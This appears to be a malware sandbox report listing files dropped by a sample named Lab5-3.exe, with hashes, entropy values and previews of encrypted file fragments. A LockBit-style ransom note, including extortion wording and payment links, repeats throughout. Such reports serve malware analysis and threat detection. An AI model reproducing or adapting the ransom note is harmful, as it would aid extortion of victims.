                                                                                                          Preview:.[.#.....N.....<8h.O.\a!1l.0.....e....sI.^u...Y....0..+........=..8.t.2......... ;...V....y.1}.4..*.8..5[...\..#o.k....G.).E:2...X.&"....<..L.i..9.z{.9n..E0+v.....4...*3~...[:ft..U.....,....k.dW.<...X.Ka.7.l9N......T..C<;..,R@Qj.Y....7?.$kw..GsN.<6[..T8.z:......a.c.l....*..'c_..<.;,...OA.n..4=at.n;.| ....bp.kX.(..0h).|$...V<..go/...;..z.q.b..a4|..^9>....KAE.Xm)....VY.Z...@G....LX.....87.3..SN....(....y4..pN.Vd..%..Z.C.Q..5"jU.]....^..=.. ug...P...b..\...S_.v!u..<.y........6^..za.O.rk.....L...do..'.HX...I..H..,g).}.s...c.......6:.h[....m.6..d.....4. .4..Dpj....?k.G.Z4....f>@..[......X..4......I.p.....L.../..,.Q.2J%......C.8.....#zT.U...c..=........B.u4. kW.+..#...._.Rs...m..z.....D..h..........Gc.|G...9.2o....I...k1h....5j..(.TY...Y.\.....2..............Bx..t.p8eD%..{.`........*...?...a.=.....2xU.%..]. oX~@..j..F..I..qH.....^Q._.]V.VO.g./.S.o..>J!..D3.....q1.-.Gg.`...n@.p..Y......:..>.b....<....4)m#u..v.....]......_&..s.f.s...}fU.^...K
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2736
                                                                                                          Entropy (8bit):7.932342317439445
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tQ3ikrw38Np1mZ1vbxi0B8MRHfUTid3hBaUoSGFcmeykEdEElU92i:OH9I1vQ88MSGx0uKeY2ElUJ
                                                                                                          MD5:1C0160F348CD34F8A54F5963065439CE
                                                                                                          SHA1:E4C593E4D3B0473A5B2470FD3899C7F7FA1A5831
                                                                                                          SHA-256:D0883934DFDA868E01EB9E748FF5880B32ECB5311A1DD663C7B7363913A3365B
                                                                                                          SHA-512:91EFCEEAD1067702C2F8BF28A3F8C4EE0F0524A8E202679C765136F978ED3EA6B9A851C88004C9C86966FC57ED7FDF026F39A7C7738DD977700189FFE331206F
                                                                                                          Malicious:false
                                                                                                          Preview:e..:<..b....,.s.*..8.....7.F..K..]o...u...G..l5.9..ul...U....'y*<..<.}.|...*(...0.:.Ztl.!..h}..,.=#.'.I+......GH..`.C_...3N..}:E....b.YD.._d.....c.X.p.t*.-.#O.'..d/WL..(..,..A....Qfx.F.>...%.c..`...S.v..\.~W. ...B7.X..b....[.R..-.O.....2...(..i.L..[%`.V...l....i.....Z./y.......T.].|aE...,;.4.9$..@....H...J..V.c.H.]G..d......5va.....s....v.v.....,m.............z-^b...l.v4.N.-P.Ld........>.G..,.9$..X......8..,.X....J.f...}a?..-g.n].A.O..nW...,..D...n.....!A..Lq.ab I.l..,x..@x..o.G......!.....4O.C....AfZ+.s..W...[X.*.A..d...~..kL.*..."dT....u...........-...1.d.t.j-...7.../....r..WQ.05...gJQ..`.@..s.=..5.\........#...9..x...0`hs.S......(..e........xe.w.`..V.r.f...PVh..0.O7....O......!...m/....L..z..~Xmx...).....-....%....8.#..l.P.kCc..oE@...Gt....~..1.w...M...Io..x.D..k....K......@&.i.|..-{t.GR....6.G.N.../J...s&R.-8m.0....N.]...Q.U8.V....=.Lq7.....V....%..S8..J$r......#{g6.8...F..M.....9J.....B...&`v...Y..N..)..r.F..0.c1..Y....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.928777338596225
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:CX/opcoTjNrRScT495fM8iEB5yKzHfUTid3hBaUoSGFcmeykEdEElU92i:YqcoTh1ScILAGx0uKeY2ElUJ
                                                                                                          MD5:04280338D30B25E2C29A1529ED7E4694
                                                                                                          SHA1:8FD1B1284751A4C6774B8A99BE5BC8263C40BCD0
                                                                                                          SHA-256:31BE51974BB4A2373FB358B10A3F2E7B1B997D5AA97BF2EE89F688DD23E685CC
                                                                                                          SHA-512:983A8801684BA1B462602DC8C645C7223B8B80E1C9FB3FEF37879E188A0077B2D7A640B006EF0338603B74827A217A6F2AD66564B53C76D04545FCD26F8FA512
                                                                                                          Malicious:false
                                                                                                          Preview:.?.e.Mm..i}..(..1.<...k..%=...9B...o..K..k....|..Ky.."...yq...[.l:..b...R.@`e.]...1'...e.)>ii...ml.V.p...6=..,s|..3....Pi.A2.sap<.l..F..*..D.*.+..s..."-.....F.!...f.O..W..ena..OB*..x.@).g.T%Q.<.C.+O....U.{.?.sS..N.cu.=X.tp2s..)._.i;....j....{...R.....,.c......$W.Wec...[. .....B.....q.....0.......+.Q.Dp......j......%...}..3W..T.i.^...P.4...........7.....H.{c.Zt.5..).].P..T8..]....8..a.=.W.:Dkd.C........p!....1q.....3`..f..8=.[........r7.1.Y@]..9.FxkS....e[.K.@.(.%,..B.r+......@.../.W....o...m.2..b..Z...\...?ZR.0.F...I......x....RVuz,9}.6....~<...?..EY.'2>@.....a...c.4A..H..;...sg..A4...viCG8+%6......)rYV1...Or.......I....Q...+C L..2.jLSi.e.+..0 ..$..J.A...*.H.E1.=k....6.:..bS)..-.x.....t..'3..N.w..5C..Y...U.... .f.G.nD.w..L.p.$......7..J.7R6.7....MVU.3.t.8.....8D..\D$h..Z.6"....9...".......)}#.N.W.=9...+#..U.,.wn..,.'.d..B...@.t....5...~.u46F.!.h..1.z...}..R.r.yZ..J9M'&...E..Z..F%..Yq...w.[[......H..1.F.}G.t.&...g....U..z%..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.927048584469368
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Ii68s25obr6nQK1RdYjTfkvHMeFHfUTid3hBaUoSGFcmeykEdEElU92i:IYs+31R6jocGx0uKeY2ElUJ
                                                                                                          MD5:C8B102A72E0948F9E48526F7B6681ADC
                                                                                                          SHA1:EF91C024A53038293FEE51E1EA4BD507FDA464E7
                                                                                                          SHA-256:6586D05C74968C7DA5552C16764853B7AA47721EF9B473C57346D139B08F78B3
                                                                                                          SHA-512:3B6BBCA3D58D239397FAA4EADA49D8D3D84215C7BD6ABED1AE99E758E0C878EFBAC591F67FD6BF53557F52BCB5DF1712BCA64DA9455C567FDA158007BA87F2E0
                                                                                                          Malicious:false
                                                                                                          Preview:R;.).V.._l...(.y.Y[kj..Y./..1.8.*.k<..-.I...].!...D...Ty._-+....^01F.!.v|K.(f.....@B.F.(.R.13.J..[.?.x...<.u....}.AA......sC.2,...l..h..'.._...MI..O..Dt...,.Mk.:v2.$..4}.S....K5J..;!.....+...a...<.V..2..<...3q@G.....~..@U*... .[i.yL.....N.-D..2.&m.Qq../......ju...4...J.T...y..?..N9.d..!.3...{\.h...|...@......$0!...w.....r..Y.H$..H.Mj.q*...)...]..;.'U?......%..6..'.Z.{.j........d.?&......ze....., 0'....>h......?...........>..g.#2......K.x@.......$.N......?.;*+...-...`A.*...).K...ZI.XR.$l...1..r.Z.!....T......<.[.....^..XL):X..X..........E'...{..K.....@..n.\.|.[.`..N..(j0........,)mnJPz......*...?5r.e.z......~1..w.49.?...t.d......dtY..c..+..&;........%.....b...?.Nu...3.ep./.?....t..^W.......l.^.e/K7v.&........X....,..2.....2o.Q'..E.[e,.H...j....u..<Vg....t.q.:....)....^}0..{.z..Hja....=......7..iLp...*<l.r^. 4...x...-.+.tlZ.`..|........d^....Q...0U1..c..c.*-../...........\.<../?...i.U.$.%o.p......./....c..(...=.U....T.........S}1-f...h1k.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2736
                                                                                                          Entropy (8bit):7.925406011338861
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5vzmponaubkkHU1MiVY8opp9cOGkfNG8HfUTid3hBaUoSGFcmeykEdEElU92i:gaQmJj7jl2Gx0uKeY2ElUJ
                                                                                                          MD5:8BA6CE5AC59301252015C1C3271FC011
                                                                                                          SHA1:6F5C4D1E2E95ED6B0E451CC807B996030298A42F
                                                                                                          SHA-256:93F82C0CFDAF68443AD468ECB547198AB0ABA91759C6B932D630489FF15C4DD3
                                                                                                          SHA-512:1C632069475A2078F1BBB323FFEDB06ADD8B7DD1D2F6A77B1494D200F4A2D795F3FD31B888A48E7D9F05DEC05B592EFDCE909662D566949D092D764FA7E1399C
                                                                                                          Malicious:false
                                                                                                          Preview:.zp.N.;.;r{...B0_@T@,.V..L...~u.x.XO.."!.@iH..3.......P.]C.:..`"...@.^..nq..t6.0._U.V8.#Q.56T.x.../(......\.l+......\ ....z..[.P..5."....@.;.........:..(..E|.........X.*.u....9.."N.a...OJ..$;O.+...$.J..&..WQ;.....}.2......{..._Z<e...-...f[l.+.'y.l...y.....Y+.\o.....4x..'.g./.$...I..T2G%F...d..$O.*Z9uLG./...x,ee.....m..^.......c.F%"]...]..... .el...._..aj.....g... .4..?...Y......zm.j..W..+.e3Q.4./..Y....J.J4..4.D.). ....z...w.j$..u......ry...{..\..?Y.#cwt;...HxB.c.l.w("6O..W.'... A.K...$.QPT..Q..}Y.i..,K..tuW1.NQ..3M....W.!............5..D...q."..2o....i8n...*J.....$|S.*;H.a..".....+6.....3yO.-#....~qr...*.....a........""...x.X>.Z.U....G^,.....5..@..+}.h./..6.%z+.$Z...T5.p..@..8.73.J.Z.Xi.."....GB..._.y.KoI!.a...#...%..ut:1.(Pb.%!....=!.Q..s&A..mM..6...{.....7E...(..W{p=`SH.M......0..YE.-.k#.....JQ......J.C.'7...*.T.Y...\...>...Q...k.$5'...'....IS.6l..&..%.......$...j.sz4q8..v!....g)..... f-....J6q!.9.h.....5!N)F.%a;.i...v.K.Y...H?....^.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.9358758563429905
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:/Jmju0qdpTHL1/YDczjIwKWDb2RU5wdyOaJaUOHfUTid3hBaUoSGFcmeykEdEElk:RmjDq3TYwKWDb29raAUhGx0uKeY2ElUJ
                                                                                                          MD5:12BC1DE155978C0441A51B6F612C6C6F
                                                                                                          SHA1:89B6BD3FAE0EC5A09038963E4C6A3BFF2014A564
                                                                                                          SHA-256:206384A194D506035433F13401AA8FF0237125B884EC8DE1FB950F38E3CD9C27
                                                                                                          SHA-512:423837DD44DC29720A36648BAB55867AA50E53AF1DF8F7878C5919C2C1B14224027E89967CFC5071987B6C632BD07BDC0B5D071F34857797E5E61554939EDFF8
                                                                                                          Malicious:false
                                                                                                          Preview:..UnV....g....@r...R,....!..@.1+..w-.IW.8w.7...n...].2.,*.Og)..q...fiW"..J..8.. P.}...Y...U..W..N.. ......oD.7...g...#.....>........r`T@....9@.NQ.&A. ..F....OcfT;...(..`.....2....+.... ..R?f..=.Cq.4..q...i....A..g...s..7T...CIb.-..bM.[~.YOa.M....M.G...)..../R..>....B".3.6....<./...S......*.v.d.q..f..)...y.rM.P.....Da....i........u....z......?..3..oB.._.p.x.?~..'......M%.`.Y.. .r.W2.73".B_... ...6.q.)'.'.....X...!.z=`.;...w...{..7....d...e.pr..UYq...=.AeF.H%.E"...J{.|..8.......A....}..6:P..../...p*":&.t.t..-|.....w..........L....UV.P.j.".T....h....4.Oj.4>11$d[4M..y~B#.Yp...[...N;6f....:..mD....Q............._:.~..=;[Y..\.U...b...g.sM.M<...m...[3B2.p....@.jJ......a"a?.N....7W5..aI.)+... .L...p.,s.).s.*..j..4Q.v...zU.Pj.A..d#+..?|c...2._....cH....va...]>g...C.6....".y.X../,..l?h............4.`<..1o..U..,mc*.5..!..6:....~.4..=..@.....V..y...3...<...*....F_.F..X..CT.....a..`.=..5.@Oy...56..XQ../..wwL.U....K}...U..Q,..E_..4-....<....r...J.9!>.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2720
                                                                                                          Entropy (8bit):7.934948744286261
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uFDt9WGqI/TPYlCWZfTmbRTWC0eIiHuzLpUyHfUTid3hBaUoSGFcmeykEdEElU93:uRUI/TPYsWpChF07lStGx0uKeY2ElUJ
                                                                                                          MD5:EBA38F61A464DA9AB0EB767CC0ACB646
                                                                                                          SHA1:4694B41A4E51475B9A1425813699EC833AC04EB2
                                                                                                          SHA-256:66987BFDBD6CD4C0DCF497274FC5EC474A1EED9C7F0C8E1B45A2DD9D426516F8
                                                                                                          SHA-512:4922626FED1ADFC2CD7B0803752EA9B6A2E77F32D9A0835E407C468CA5A891BF69972DDA8408542FB1D4FEEE8675D0458C9014F9018857D56E7EFBD41753D262
                                                                                                          Malicious:false
                                                                                                          Preview:9.(........hgr<;.S%Cf....W.l.....cQ.C*...Y.$.:.....k.Yd.^v......>.@.....'...%[.b|X...*}..........7nh...@..Z......N..l.......0O+..,c..G..v......o.P).*.[.EU......Bs..63....3..Iv}.e.?:..?o*.h..ia.].|.j.......]......`_M.a*....C.....D. 5~....z.:w.I...,..A0.u.y.?.".jM:.-.z;.l.....s..jBol.#J.j.....{.....r.PK.T....i..,.........f/P.A|..i.zX.h.e....8. cx......8.t.Hr.#.....(z.|M'./.. ...$.P.e..+V<..l21hp.D.sk\.Z......b.h.....>..*..1uqJ3...39v3..).}8(Z*.h.A.L....I..`.....4*I....X.*j......g..E..<.}..:^/.V5.E...Cq..\...9.9.J.KHK.../..r.!..X..1..1.E..l........[.,...8.z...'.lP.W...w.>.a...'.@.<.*...[.t2 g.u...H...h..@=2...O."..._.+..&......` .......-...,mP.....R.o..}B@.jU..{.7..I.....?)D...F.|....G...B.{..2.y.5..8..b....?W..cy&......x..OGI..AC.*.9...*%.H..O...E...L...w.!..b.j.+....YL.eP.["...b...... .m...2....K..{.;.F......9..L...Hg..i.....H<...0...!...m:. .k...:?...c0.....!!PWD..0...:[...$v).{..2nUS..L\..Z<.1..U.`'.YVqq..j.I...N.A..rs.V7.E....v#..T....;..!1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2736
                                                                                                          Entropy (8bit):7.933326183151948
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:h1V+PAI9Ki9TBAZlLKNF1U0oM9RlmujgHfUTid3hBaUoSGFcmeykEdEElU92i:hmPAIsiB+lLABlHnGx0uKeY2ElUJ
                                                                                                          MD5:0E91D87696EB93A745C0644CBF9A3DD9
                                                                                                          SHA1:85CF2E914F3D3CFBD4D68C65E68C67C961AD6441
                                                                                                          SHA-256:8271E1E74651554F85E665C55CF4BBAC39880012AFA87A78462F94878F967795
                                                                                                          SHA-512:E0E3E4EF0FFEA8B1A6B0374ECCDE792FEA248418042DCF9D919CB477BCDEBF42A7A617FA12E5D57312131856A297ED0694BB5C5115ECB7B2D0B7A7EDE9714F75
                                                                                                          Malicious:false
                                                                                                          Preview:y.....N.m...};..|.-.}.....>VX...YQ.F.k..I..Y..c..ZO.W.n.@b.{.U..5..;S.L#y.., -"..G.}.B[-1.......r0@.*x.1.`.wJ|.e8I.d...w.4Ir.Z.P..)..K.`...G!'.}.>.....y..y`....=...Z...!.C[Z....v.`..&..8....V....b-c.$..Q...@.........Erm~.X..5...fX.0...;T.yF....&.b..D...S.E#R.{...N#...y.E.x..."..9....r..J..W..@.J.-5.q:.&...Q.Ct9g$........M8......4.l.....2...I.?...`............AW.^NX..g..Th)......n.....<$..^G(.....I.....)[*.3-.9.w)...]..R...v....<.......X..?....<.).&Fa~..go...wnO.g.>C"E.R..HO.9..s.z...D.3Z.....[.....).7....O..q.3...=..o......._...%.Q...y..W..[s...W.$.,...{..S..30....c...+...hz...EX%....h. <..E..V}[......z..P.P.wAG`*&.i]..u..9.M""Ll.l.....{...Z!..p;.@7.bQ...w.....q.......[_....ByN&.m....5.h.G'(_.B.<.. .Hf.Y.Uu..c.D}.s...i.G.ps.F.........8(..K...1....0=d+D.f.:${....$.I.~{F.m...'^`.k..|.6..f..^]..P..dF$..RE.NS.........|..B.*k.....}....0....F.A.f.."<TYT-m....D.w...*+....mOK.^i.J.v.....wZM .5....T.|.C.|vl.....Q..].E..=gq7"....G.r.2./
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
